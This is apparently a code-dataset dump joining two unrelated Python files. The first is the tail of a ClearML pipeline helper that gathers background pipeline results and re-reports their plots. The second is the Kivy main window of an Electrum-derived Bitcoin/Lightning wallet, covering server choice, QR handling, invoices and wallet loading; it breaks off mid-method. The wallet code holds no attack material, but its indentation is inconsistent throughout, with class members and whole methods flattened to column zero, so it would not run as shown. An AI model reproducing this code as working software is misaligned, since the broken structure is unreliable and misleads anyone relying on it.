    call order, replicate their plots onto the master Task, and clear the
    pending-instance list. Failures while joining/collecting are ignored
    (best-effort shutdown).
    """
    collected = []
    if not cls._multi_pipeline_instances:
        return collected
    print('Waiting for background pipelines to finish')
    for proc, result_queue in cls._multi_pipeline_instances:
        try:
            proc.join()
        except BaseException:  # noqa
            pass
        # noinspection PyBroadException
        try:
            task_id, pipeline_result = result_queue.get_nowait()
            collected.append(pipeline_result)
            cls._add_pipeline_plots(task_id)
        except Exception:
            pass
    cls._multi_pipeline_instances = []
    return collected
@classmethod
def _add_pipeline_plots(cls, pipeline_task_id):
    # Replicate a finished pipeline's summary plots (execution flow /
    # details) onto the current "master" Task, so multi-pipeline runs are
    # visible from a single place.
    if not Task.current_task():
        return
    from clearml.backend_api.services import events
    # fetch the last reported plots from the pipeline Task
    res = Task.current_task().send(
        events.GetTaskPlotsRequest(task=pipeline_task_id, iters=1),
        raise_on_errors=False,
        ignore_errors=True,
    )
    execution_flow = None
    execution_details = None
    for p in res.response.plots:
        try:
            if p['metric'] == cls._report_plot_execution_flow['title'] and \
                    p['variant'] == cls._report_plot_execution_flow['series']:
                execution_flow = json.loads(p['plot_str'])
            elif p['metric'] == cls._report_plot_execution_details['title'] and \
                    p['variant'] == cls._report_plot_execution_details['series']:
                execution_details = json.loads(p['plot_str'])
                # suffix the table name with the source pipeline Task id
                execution_details['layout']['name'] += ' - ' + str(pipeline_task_id)
        except Exception as ex:
            getLogger('clearml.automation.controller').warning(
                'Multi-pipeline plot update failed: {}'.format(ex))
    # re-report under a per-pipeline series so multiple pipelines don't clash
    if execution_flow:
        Task.current_task().get_logger().report_plotly(
            title=cls._report_plot_execution_flow['title'],
            series='{} - {}'.format(cls._report_plot_execution_flow['series'], pipeline_task_id),
            iteration=0, figure=execution_flow)
    if execution_details:
        Task.current_task().get_logger().report_plotly(
            title=cls._report_plot_execution_details['title'],
            series='{} - {}'.format(cls._report_plot_execution_details['series'], pipeline_task_id),
            iteration=0, figure=execution_details)
|
main_window.py | import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum_onion.storage import WalletStorage, StorageReadWriteError
from electrum_onion.wallet_db import WalletDB
from electrum_onion.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum_onion.wallet import check_password_for_directory, update_password_for_directory
from electrum_onion.plugin import run_hook
from electrum_onion import util
from electrum_onion.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
maybe_extract_bolt11_invoice)
from electrum_onion.invoices import PR_PAID, PR_FAILED
from electrum_onion import blockchain
from electrum_onion.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_onion.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from electrum_onion.logging import Logger
from electrum_onion.gui import messages
from .i18n import _
from . import KIVY_GUI_PATH
from kivy.app import App
from kivy.core.window import Window
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog, PasswordDialog
from .uix.dialogs.choice_dialog import ChoiceDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_onion.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_onion.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_onion.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_onion.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: deferred to first use, for startup speed on android
notification = app = ref = None

# Register a widget cache; timeout=0 keeps entries cached forever
# (keeps memory churn down for the lifetime of the process).
Cache.register('electrum_onion_widgets', timeout=0)

from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard

# Lazy factory registration: the widget module is imported only when the
# kv language first instantiates a TabbedCarousel.
Factory.register('TabbedCarousel', module='electrum_onion.gui.kivy.uix.screens')

# Register fonts; without this you won't be able to use bold/italic
# inside markup.
# NOTE(review): this import shadows kivy.uix.label.Label imported above —
# presumably intentional, since only the text-core Label is used below.
from kivy.core.text import Label
Label.register(
    'Roboto',
    KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
    KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
    KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
    KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
)
from electrum_onion.util import (NoDynamicFeeEstimates, NotEnoughFunds,
BITCOIN_BIP21_URI_SCHEME, LIGHTNING_URI_SCHEME,
UserFacingException)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog, SwapDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum_onion.simple_config import SimpleConfig
from electrum_onion.plugin import Plugins
from electrum_onion.paymentrequest import PaymentRequest
class ElectrumWindow(App, Logger):
# SimpleConfig instance backing the GUI (set in __init__ from kwargs)
electrum_config = ObjectProperty(None)
# two-letter UI language code; on_language() applies changes
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)         # local chain height
num_nodes = NumericProperty(0)          # number of connected interfaces
server_host = StringProperty('')        # currently configured server host
server_port = StringProperty('')        # currently configured server port
num_chains = NumericProperty(0)         # number of known chain forks
blockchain_name = StringProperty('')    # name of the chain we follow
fee_status = StringProperty('Fee')      # fee summary shown in the UI
balance = StringProperty('')            # formatted wallet balance
fiat_balance = StringProperty('')       # formatted fiat balance
is_fiat = BooleanProperty(False)        # whether amounts display in fiat
blockchain_forkpoint = NumericProperty(0)
# lightning gossip statistics (updated from network callbacks)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
# auto-select server; on_auto_connect() pushes changes to the network
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
    """Kivy handler: push the new auto_connect flag into the network layer."""
    params = self.network.get_parameters()._replace(auto_connect=self.auto_connect)
    self.network.run_from_another_thread(self.network.set_parameters(params))

def toggle_auto_connect(self, x):
    """Invert the auto_connect property; its on_* handler applies it."""
    self.auto_connect = not self.auto_connect
# connect to a single server only; handler below pushes changes to the network
oneserver = BooleanProperty(False)

def on_oneserver(self, instance, x):
    """Kivy handler: apply the new oneserver flag to the network layer."""
    params = self.network.get_parameters()._replace(oneserver=self.oneserver)
    self.network.run_from_another_thread(self.network.set_parameters(params))

def toggle_oneserver(self, x):
    """Invert the oneserver property; its on_* handler applies it."""
    self.oneserver = not self.oneserver
# human-readable proxy summary shown in the network dialog
proxy_str = StringProperty('')

def update_proxy_str(self, proxy: dict):
    """Refresh proxy_str from a proxy config dict ('mode'/'host'/'port')."""
    # NOTE(review): assumes 'host' and 'port' are strings when 'mode' is set
    if proxy.get('mode'):
        self.proxy_str = proxy.get('host') + ':' + proxy.get('port')
    else:
        self.proxy_str = _('None')
def choose_server_dialog(self, popup):
    # Present a ChoiceDialog listing all known servers that speak the
    # preferred protocol; the selection is written back into the popup.
    protocol = PREFERRED_NETWORK_PROTOCOL

    def cb2(server_str):
        # selection callback: update the text field on the network popup
        popup.ids.server_str.text = server_str

    servers = self.network.get_servers()
    server_choices = {}
    for _host, d in sorted(servers.items()):
        port = d.get(protocol)  # servers without this protocol are skipped
        if port:
            server = ServerAddr(_host, port, protocol=protocol)
            server_choices[server.net_addr_str()] = _host
    ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
    """Try to parse *server_str*; on success reconnect to that server,
    otherwise display an error and leave the connection unchanged."""
    net_params = self.network.get_parameters()
    try:
        server = ServerAddr.from_str_with_inference(server_str)
        if not server:
            raise Exception("failed to parse")
    except Exception as exc:
        self.show_error(_("Invalid server details: {}").format(repr(exc)))
        return
    self.network.run_from_another_thread(
        self.network.set_parameters(net_params._replace(server=server)))
def choose_blockchain_dialog(self, dt):
    # Let the user pick which chain fork to follow, when more than one is known.
    chains = self.network.get_blockchains()

    def cb(name):
        # map the chosen human-readable name back to its chain id, then switch
        with blockchain.blockchains_lock:
            blockchain_items = list(blockchain.blockchains.items())
        for chain_id, b in blockchain_items:
            if name == b.get_name():
                self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))

    chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
    chain_objects = filter(lambda b: b is not None, chain_objects)
    names = [b.get_name() for b in chain_objects]
    if len(names) > 1:  # only ask when there is an actual choice
        cur_chain = self.network.blockchain().get_name()
        ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
# --- user settings toggles; each on_* handler persists the new value ---

use_rbf = BooleanProperty(False)

def on_use_rbf(self, instance, x):
    """Persist the replace-by-fee preference."""
    self.electrum_config.set_key('use_rbf', self.use_rbf, True)

use_gossip = BooleanProperty(False)

def on_use_gossip(self, instance, x):
    """Persist the gossip preference and start/stop gossip accordingly."""
    self.electrum_config.set_key('use_gossip', self.use_gossip, True)
    if not self.network:
        return
    if self.use_gossip:
        self.network.start_gossip()
    else:
        self.network.run_from_another_thread(
            self.network.stop_gossip())

use_change = BooleanProperty(False)

def on_use_change(self, instance, x):
    """Persist the use-change-address preference into the wallet db."""
    if not self.wallet:
        return
    self.wallet.use_change = self.use_change
    self.wallet.db.put('use_change', self.use_change)
    self.wallet.save_db()

use_unconfirmed = BooleanProperty(False)

def on_use_unconfirmed(self, instance, x):
    """Persist spending of unconfirmed coins (stored inverted as 'confirmed_only')."""
    self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)

use_recoverable_channels = BooleanProperty(True)

def on_use_recoverable_channels(self, instance, x):
    """Persist the recoverable-channels preference."""
    self.electrum_config.set_key('use_recoverable_channels', self.use_recoverable_channels, True)
def switch_to_send_screen(func):
    """Decorator for actions that need the send screen: poll every 100ms
    until the send screen exists, run *func* once, then stop polling."""
    def wrapper(self, *args):
        def poll(dt):
            # returning False cancels the scheduled interval in Kivy
            if not self.wallet:
                return True  # no wallet yet: keep polling
            if self.send_screen:
                func(self, *args)
                return False  # action delivered: stop
            self.switch_to('send')
            return True  # screen being built: poll again
        Clock.schedule_interval(poll, 0.1)
    return wrapper
@switch_to_send_screen
def set_URI(self, uri):
    # Forward a bitcoin URI to the send screen (decorator waits for it to exist).
    self.send_screen.set_URI(uri)

@switch_to_send_screen
def set_ln_invoice(self, invoice):
    # Forward a lightning invoice to the send screen (decorator waits for it to exist).
    self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
    """Android intent handler: route bitcoin/lightning URIs to the send screen."""
    uri = str(intent.getDataString())
    scheme = str(intent.getScheme()).lower()
    if scheme == LIGHTNING_URI_SCHEME:
        self.set_ln_invoice(uri)
    elif scheme == BITCOIN_BIP21_URI_SCHEME:
        self.set_URI(uri)
def on_language(self, instance, language):
    """Kivy handler: apply a newly selected UI language."""
    self.logger.info('language: {}'.format(language))
    _.switch_lang(language)
def update_history(self, *dt):
    """Refresh the history screen, if it has been created."""
    if not self.history_screen:
        return
    self.history_screen.update()

def on_quotes(self, d):
    """FX quotes changed: refresh status bar and history."""
    self.logger.info("on_quotes")
    self._trigger_update_status()
    self._trigger_update_history()

def on_history(self, d):
    """Wallet history changed: drop cached coin prices and redraw."""
    self.logger.info("on_history")
    if self.wallet:
        self.wallet.clear_coin_price_cache()
    self._trigger_update_history()

def on_fee_histogram(self, *args):
    """Mempool fee histogram changed: history rows show fee info, so redraw."""
    self._trigger_update_history()
def on_request_status(self, event, wallet, key, status):
    # Network callback: a receive-request's payment status changed.
    req = self.wallet.receive_requests.get(key)
    if req is None:
        # the request was probably deleted in the meantime
        return
    if self.receive_screen:
        if status == PR_PAID:
            # paid requests leave the pending list -> full refresh
            self.receive_screen.update()
        else:
            self.receive_screen.update_item(key, req)
    if self.request_popup and self.request_popup.key == key:
        self.request_popup.update_status()
    if status == PR_PAID:
        self.show_info(_('Payment Received') + '\n' + key)
        self._trigger_update_history()
def on_invoice_status(self, event, wallet, key):
    # Network callback: an outgoing invoice's status changed.
    req = self.wallet.get_invoice(key)
    if req is None:
        # the invoice was probably deleted in the meantime
        return
    status = self.wallet.get_invoice_status(req)
    if self.send_screen:
        if status == PR_PAID:
            # paid invoices leave the pending list -> full refresh
            self.send_screen.update()
        else:
            self.send_screen.update_item(key, req)
    if self.invoice_popup and self.invoice_popup.key == key:
        self.invoice_popup.update_status()
def on_payment_succeeded(self, event, wallet, key):
    """Notify the user of a successful outgoing payment and redraw history."""
    label = self.wallet.get_label(key)
    self.show_info(_('Payment succeeded') + '\n\n' + label)
    self._trigger_update_history()

def on_payment_failed(self, event, wallet, key, reason):
    """Notify the user that an outgoing payment failed, with the reason."""
    self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
    # Getter for the base_unit AliasProperty (reads the configured unit).
    return self.electrum_config.get_base_unit()

def _set_bu(self, value):
    # Setter for base_unit: persist to config, then redraw status/history.
    self.electrum_config.set_base_unit(value)
    self._trigger_update_status()
    self._trigger_update_history()

# name of the currently open wallet, shown in the UI
wallet_name = StringProperty(_('No Wallet'))
# base_unit aliases the config value; defined after its getter/setter
# on purpose (they must already exist when AliasProperty is built)
base_unit = AliasProperty(_get_bu, _set_bu)
# fiat currency code ('' when fiat display is disabled)
fiat_unit = StringProperty('')

def on_fiat_unit(self, a, b):
    # fiat unit changed: history amounts must be re-rendered
    self._trigger_update_history()

def decimal_point(self):
    # number of decimal places implied by the configured base unit
    return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
    """Convert an amount string (in the current base unit) to fiat text.

    Returns '' when the input is empty, FX is disabled, or no rate is known.
    """
    if not (amount_str and self.fx.is_enabled()):
        return ''
    rate = self.fx.exchange_rate()
    if rate.is_nan():
        return ''
    sats = self.get_amount(amount_str + ' ' + self.base_unit)
    fiat_amount = sats * rate / pow(10, 8)
    # two decimals, with trailing zeros (and a bare dot) stripped
    return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
    """Convert a fiat amount string into a base-unit amount string.

    Returns '' on empty input or when no exchange rate is known.
    """
    if not fiat_amount:
        return ''
    rate = self.fx.exchange_rate()
    if rate.is_nan():
        return ''
    sats = pow(10, 8) * Decimal(fiat_amount) / Decimal(rate)
    return format_satoshis_plain(int(sats), decimal_point=self.decimal_point())
def get_amount(self, amount_str):
    """Parse '<decimal> <unit>' into an integer satoshi amount.

    Returns None when the numeric part does not parse; asserts that the
    unit matches the currently configured base unit.
    """
    value_part, unit_part = amount_str.split()
    assert unit_part == self.base_unit
    try:
        amount = Decimal(value_part)
    except BaseException:
        return None
    scale = pow(10, self.decimal_point())
    return int(scale * amount)
# backing store for the read-only `orientation` alias below
_orientation = OptionProperty('landscape',
                              options=('landscape', 'portrait'))

def _get_orientation(self):
    return self._orientation

orientation = AliasProperty(_get_orientation,
                            None,
                            bind=('_orientation',))
'''Current screen orientation of the device.
Can be one of `landscape` or `portrait`.

:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''

# backing store for the read-only `ui_mode` alias below
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))

def _get_ui_mode(self):
    return self._ui_mode

ui_mode = AliasProperty(_get_ui_mode,
                        None,
                        bind=('_ui_mode',))
'''Tries to ascertain the kind of device the app is running on.
Can be one of `tablet` or `phone`.

:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
    def __init__(self, **kwargs):
        """Initialise app state from kwargs (config, network, plugins, gui_object)
        and create the throttled Clock triggers used for UI refreshes."""
        # initialize variables
        self._clipboard = Clipboard
        self.info_bubble = None
        self.nfcscanner = None
        self.tabs = None
        self.is_exit = False  # double-back-press exit flag, see on_keyboard()
        self.wallet = None  # type: Optional[Abstract_Wallet]
        self.pause_time = 0  # timestamp of last on_pause(), used to re-lock on resume
        self.asyncio_loop = asyncio.get_event_loop()
        self.password = None
        self._use_single_password = False
        self.resume_dialog = None
        App.__init__(self)#, **kwargs)
        Logger.__init__(self)
        self.electrum_config = config = kwargs.get('config', None)  # type: SimpleConfig
        self.language = config.get('language', 'en')
        self.network = network = kwargs.get('network', None)  # type: Network
        if self.network:
            # seed network-status properties from the current network state
            self.num_blocks = self.network.get_local_height()
            self.num_nodes = len(self.network.get_interfaces())
            net_params = self.network.get_parameters()
            self.server_host = net_params.server.host
            self.server_port = str(net_params.server.port)
            self.auto_connect = net_params.auto_connect
            self.oneserver = net_params.oneserver
            self.proxy_config = net_params.proxy if net_params.proxy else {}
            self.update_proxy_str(self.proxy_config)
        self.plugins = kwargs.get('plugins', None)  # type: Plugins
        self.gui_object = kwargs.get('gui_object', None)  # type: ElectrumGui
        self.daemon = self.gui_object.daemon
        self.fx = self.daemon.fx
        self.use_rbf = config.get('use_rbf', True)
        self.use_gossip = config.get('use_gossip', False)
        self.use_unconfirmed = not config.get('confirmed_only', False)
        # create triggers so as to minimize updating a max of 2 times a sec
        self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
        self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
        self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
        self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
        self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
        # cached dialogs
        self._settings_dialog = None
        self._channels_dialog = None
        self._addresses_dialog = None
        self.set_fee_status()
        self.invoice_popup = None
        self.request_popup = None
    def on_pr(self, pr: 'PaymentRequest'):
        """Handle an incoming BIP70-style payment request: verify it, then either
        report an error/expiry or open it in the send screen."""
        if not self.wallet:
            self.show_error(_('No wallet loaded.'))
            return
        if pr.verify(self.wallet.contacts):
            key = pr.get_id()
            invoice = self.wallet.get_invoice(key)  # FIXME wrong key...
            if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
                self.show_error("invoice already paid")
                self.send_screen.do_clear()
            elif pr.has_expired():
                self.show_error(_('Payment request has expired'))
            else:
                self.switch_to('send')
                self.send_screen.set_request(pr)
        else:
            # verification failed; pr.error carries the reason
            self.show_error("invoice error:" + pr.error)
            self.send_screen.do_clear()
def on_qr(self, data):
from electrum_onion.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.set_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum_onion.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
    def update_tab(self, name):
        # Refresh a single screen (e.g. 'send') if it has been created already.
        s = getattr(self, name + '_screen', None)
        if s:
            s.update()
    @profiler
    def update_tabs(self):
        # Refresh all main screens; screens not yet instantiated are skipped.
        for name in ['send', 'history', 'receive']:
            self.update_tab(name)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
    def show_request(self, is_lightning, key):
        # Open the receive-request popup for the request identified by `key`.
        from .uix.dialogs.request_dialog import RequestDialog
        self.request_popup = RequestDialog('Request', key)
        self.request_popup.open()
    def show_invoice(self, is_lightning, key):
        # Open the invoice popup; for lightning invoices the bolt11 string is shown.
        from .uix.dialogs.invoice_dialog import InvoiceDialog
        invoice = self.wallet.get_invoice(key)
        if not invoice:
            return
        data = invoice.invoice if is_lightning else key
        self.invoice_popup = InvoiceDialog('Invoice', data, key)
        self.invoice_popup.open()
    def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None):
        """Open a QR-code popup for `data`; on render failure, optionally copy
        the text to the clipboard and inform the user."""
        from .uix.dialogs.qr_dialog import QRDialog
        def on_qr_failure():
            popup.dismiss()
            msg = _('Failed to display QR code.')
            if text_for_clipboard:
                msg += '\n' + _('Text copied to clipboard.')
                self._clipboard.copy(text_for_clipboard)
            # schedule: the info bubble must be shown after the popup is dismissed
            Clock.schedule_once(lambda dt: self.show_info(msg))
        popup = QRDialog(
            title, data, show_text,
            failure_cb=on_qr_failure,
            text_for_clipboard=text_for_clipboard,
            help_text=help_text)
        popup.open()
    def scan_qr(self, on_complete):
        """Scan a QR code and pass its text content to `on_complete`.

        On Android this launches the native scanner activity and waits for its
        result; elsewhere it falls back to scan_qr_non_android().
        """
        if platform != 'android':
            return self.scan_qr_non_android(on_complete)
        from jnius import autoclass, cast
        from android import activity
        PythonActivity = autoclass('org.kivy.android.PythonActivity')
        SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
        Intent = autoclass('android.content.Intent')
        intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
        def on_qr_result(requestCode, resultCode, intent):
            try:
                if resultCode == -1:  # RESULT_OK:
                    # this doesn't work due to some bug in jnius:
                    # contents = intent.getStringExtra("text")
                    String = autoclass("java.lang.String")
                    contents = intent.getStringExtra(String("text"))
                    on_complete(contents)
            except Exception as e:  # exc would otherwise get lost
                send_exception_to_crash_reporter(e)
            finally:
                # one-shot listener: always unbind, even on failure
                activity.unbind(on_activity_result=on_qr_result)
        activity.bind(on_activity_result=on_qr_result)
        PythonActivity.mActivity.startActivityForResult(intent, 0)
    def scan_qr_non_android(self, on_complete):
        # Desktop fallback: scan via the configured camera device.
        from electrum_onion import qrscanner
        try:
            video_dev = self.electrum_config.get_video_device()
            data = qrscanner.scan_barcode(video_dev)
            on_complete(data)
        except UserFacingException as e:
            self.show_error(e)
        except BaseException as e:
            self.logger.exception('camera error')
            self.show_error(repr(e))
    def do_share(self, data, title):
        # Android-only: open the system share chooser with `data` as plain text.
        if platform != 'android':
            return
        from jnius import autoclass, cast
        JS = autoclass('java.lang.String')
        Intent = autoclass('android.content.Intent')
        sendIntent = Intent()
        sendIntent.setAction(Intent.ACTION_SEND)
        sendIntent.setType("text/plain")
        sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
        PythonActivity = autoclass('org.kivy.android.PythonActivity')
        currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
        it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
        currentActivity.startActivity(it)
    def build(self):
        # Kivy entry point: load the root widget tree from the main kv file.
        return Builder.load_file(KIVY_GUI_PATH + '/main.kv')
    def _pause(self):
        # Android-only: send the activity to the background (do not exit).
        if platform == 'android':
            # move activity to back
            from jnius import autoclass
            python_act = autoclass('org.kivy.android.PythonActivity')
            mActivity = python_act.mActivity
            mActivity.moveTaskToBack(True)
    def handle_crash_on_startup(func):
        # Decorator (note: no `self`; applied to methods within the class body).
        # Wraps startup code so an exception shows the crash reporter and then
        # shuts the app down instead of dying silently.
        def wrapper(self, *args, **kwargs):
            try:
                return func(self, *args, **kwargs)
            except Exception as e:
                self.logger.exception('crash on startup')
                from .uix.dialogs.crash_reporter import CrashReporter
                # show the crash reporter, and when it's closed, shutdown the app
                cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
                cr.on_dismiss = lambda: self.stop()
                Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
        return wrapper
    @handle_crash_on_startup
    def on_start(self):
        ''' This is the start point of the kivy ui:
        builds the UI, registers network/wallet callbacks, binds the Android
        intent handler, then loads the last-used wallet and any URI passed
        via the config.
        '''
        import time
        self.logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
        Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
        #Window.softinput_mode = 'below_target'
        self.on_size(Window, Window.size)
        self.init_ui()
        crash_reporter.ExceptionHook(self)
        # init plugins
        run_hook('init_kivy', self)
        # fiat currency
        self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
        # default tab
        self.switch_to('history')
        # bind intent for bitcoin: URI scheme
        if platform == 'android':
            from android import activity
            from jnius import autoclass
            PythonActivity = autoclass('org.kivy.android.PythonActivity')
            mactivity = PythonActivity.mActivity
            # process the intent the app was launched with, then listen for new ones
            self.on_new_intent(mactivity.getIntent())
            activity.bind(on_new_intent=self.on_new_intent)
        # connect callbacks
        if self.network:
            interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
                         'status', 'new_transaction', 'verified']
            util.register_callback(self.on_network_event, interests)
            util.register_callback(self.on_fee, ['fee'])
            util.register_callback(self.on_fee_histogram, ['fee_histogram'])
            util.register_callback(self.on_quotes, ['on_quotes'])
            util.register_callback(self.on_history, ['on_history'])
            util.register_callback(self.on_channels, ['channels_updated'])
            util.register_callback(self.on_channel, ['channel'])
            util.register_callback(self.on_invoice_status, ['invoice_status'])
            util.register_callback(self.on_request_status, ['request_status'])
            util.register_callback(self.on_payment_failed, ['payment_failed'])
            util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
            util.register_callback(self.on_channel_db, ['channel_db'])
            util.register_callback(self.set_num_peers, ['gossip_peers'])
            util.register_callback(self.set_unknown_channels, ['unknown_channels'])
        # load wallet
        self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
        # URI passed in config
        uri = self.electrum_config.get('url')
        if uri:
            self.set_URI(uri)
    def on_channel_db(self, event, num_nodes, num_channels, num_policies):
        # 'channel_db' event: update lightning gossip statistics shown in the UI.
        self.lightning_gossip_num_nodes = num_nodes
        self.lightning_gossip_num_channels = num_channels
    def set_num_peers(self, event, num_peers):
        # 'gossip_peers' event: number of connected gossip peers.
        self.lightning_gossip_num_peers = num_peers
    def set_unknown_channels(self, event, unknown):
        # 'unknown_channels' event: number of channels still being queried.
        self.lightning_gossip_num_queries = unknown
    def get_wallet_path(self):
        # Path of the open wallet's storage file, or '' when no wallet is open.
        if self.wallet:
            return self.wallet.storage.path
        else:
            return ''
    def on_wizard_success(self, storage, db, password):
        """Install-wizard completion: build the wallet, attach it to the network
        and daemon, and load it into the GUI."""
        self.password = password
        if self.electrum_config.get('single_password'):
            # propagate one password to all wallets in the directory
            self._use_single_password = update_password_for_directory(self.electrum_config, password, password)
        self.logger.info(f'use single password: {self._use_single_password}')
        wallet = Wallet(db, storage, config=self.electrum_config)
        wallet.start_network(self.daemon.network)
        self.daemon.add_wallet(wallet)
        self.load_wallet(wallet)
    def on_wizard_aborted(self):
        # wizard did not return a wallet; and there is no wallet open atm
        if not self.wallet:
            self.stop()
    def load_wallet_by_name(self, path):
        """Open the wallet at `path`, prompting for a password unless the
        shared single password already decrypts it."""
        if not path:
            return
        if self.wallet and self.wallet.storage.path == path:
            return  # already open
        if self.password and self._use_single_password:
            storage = WalletStorage(path)
            # call check_password to decrypt
            storage.check_password(self.password)
            self.on_open_wallet(self.password, storage)
            return
        d = OpenWalletDialog(self, path, self.on_open_wallet)
        d.open()
    def on_open_wallet(self, password, storage):
        # New file -> run the install wizard; existing file -> load its DB.
        if not storage.file_exists():
            wizard = InstallWizard(self.electrum_config, self.plugins)
            wizard.path = storage.path
            wizard.run('new')
        else:
            assert storage.is_past_initial_decryption()
            db = WalletDB(storage.read(), manual_upgrades=False)
            assert not db.requires_upgrade()
            self.on_wizard_success(storage, db, password)
    def on_stop(self):
        # Kivy shutdown hook: detach the wallet from the daemon.
        self.logger.info('on_stop')
        self.stop_wallet()
    def stop_wallet(self):
        # Close the current wallet in the daemon and forget the reference.
        if self.wallet:
            self.daemon.stop_wallet(self.wallet.storage.path)
            self.wallet = None
    def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
        """Handle hardware keys: back (27) needs a second press to exit;
        settings keys (319/282) are consumed."""
        if key == 27 and self.is_exit is False:
            self.is_exit = True
            self.show_info(_('Press again to exit'))
            return True  # consume the first back press
        # override settings button
        if key in (319, 282):  #f1/settings button on android
            #self.gui.main_gui.toggle_settings(self)
            return True
    def settings_dialog(self):
        # Open (and lazily create/cache) the settings dialog.
        from .uix.dialogs.settings import SettingsDialog
        if self._settings_dialog is None:
            self._settings_dialog = SettingsDialog(self)
        self._settings_dialog.update()
        self._settings_dialog.open()
    def lightning_open_channel_dialog(self):
        """Open the 'open channel' dialog; warn first-time users before their
        first channel."""
        if not self.wallet.has_lightning():
            self.show_error(_('Lightning is not enabled for this wallet'))
            return
        if not self.wallet.lnworker.channels and not self.wallet.lnworker.channel_backups:
            warning = _(messages.MSG_LIGHTNING_WARNING)
            d = Question(_('Do you want to create your first channel?') +
                         '\n\n' + warning, self.open_channel_dialog_with_warning)
            d.open()
        else:
            d = LightningOpenChannelDialog(self)
            d.open()
    def swap_dialog(self):
        # Open the submarine-swap dialog.
        d = SwapDialog(self, self.electrum_config)
        d.open()
    def open_channel_dialog_with_warning(self, b):
        # Question callback: `b` is True when the user accepted the warning.
        if b:
            d = LightningOpenChannelDialog(self)
            d.open()
    def lightning_channels_dialog(self):
        # Open (and lazily create/cache) the channel list dialog.
        if self._channels_dialog is None:
            self._channels_dialog = LightningChannelsDialog(self)
        self._channels_dialog.open()
    def on_channel(self, evt, wallet, chan):
        # 'channel' event: refresh the channel list dialog on the UI thread.
        if self._channels_dialog:
